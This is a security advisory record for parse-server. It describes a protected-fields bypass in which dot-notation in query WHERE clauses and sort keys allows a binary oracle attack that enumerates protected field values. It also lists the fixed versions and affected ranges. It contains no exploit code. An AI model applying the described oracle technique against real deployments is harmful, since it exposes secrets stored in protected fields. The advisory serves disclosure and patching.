GHSA-r2m8-pxm9-9c4g

Source

https://github.com/advisories/GHSA-r2m8-pxm9-9c4g

Import Source

https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/03/GHSA-r2m8-pxm9-9c4g/GHSA-r2m8-pxm9-9c4g.json

JSON Data

https://api.osv.dev/v1/vulns/GHSA-r2m8-pxm9-9c4g

Aliases

Published

2026-03-11T00:34:59Z

Modified

2026-03-13T13:10:57.234333Z

Severity

8.7 (High) CVSS_V4 - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N CVSS Calculator

Summary

Parse Server has a protected fields bypass via dot-notation in query and sort

Details

Impact

The protectedFields class-level permission (CLP) can be bypassed using dot-notation in query WHERE clauses and sort parameters. An attacker can use dot-notation to query or sort by sub-fields of a protected field, enabling a binary oracle attack to enumerate protected field values.

This affects both MongoDB and PostgreSQL deployments.

Patches

The fix ensures that query WHERE clause keys and sort keys are checked against protected fields by extracting the root field from dot-notation paths. For example, a query on secretObj.apiKey is now correctly blocked when secretObj is a protected field.

Workarounds

None.

References

GitHub security advisory: https://github.com/parse-community/parse-server/security/advisories/GHSA-r2m8-pxm9-9c4g
Fix Parse Server 9: https://github.com/parse-community/parse-server/releases/tag/9.6.0-alpha.6
Fix Parse Server 8: https://github.com/parse-community/parse-server/releases/tag/8.6.32

Database specific

{
    "nvd_published_at": "2026-03-11T18:16:26Z",
    "github_reviewed_at": "2026-03-11T00:34:59Z",
    "cwe_ids": [
        "CWE-284"
    ],
    "severity": "HIGH",
    "github_reviewed": true
}

References

Affected packages

npm / parse-server

Package

Name: parse-server; View open source insights on deps.dev
Purl: pkg:npm/parse-server

Affected ranges

Type: SEMVER
Events: Introduced

9.0.0-alpha.1

Fixed

9.6.0-alpha.6

Database specific

source

"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/03/GHSA-r2m8-pxm9-9c4g/GHSA-r2m8-pxm9-9c4g.json"

npm / parse-server

Package

Name: parse-server; View open source insights on deps.dev
Purl: pkg:npm/parse-server

Affected ranges

Type: SEMVER
Events: Introduced

0Unknown introduced version / All previous versions are affected

Fixed

8.6.32

Database specific

source

"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/03/GHSA-r2m8-pxm9-9c4g/GHSA-r2m8-pxm9-9c4g.json"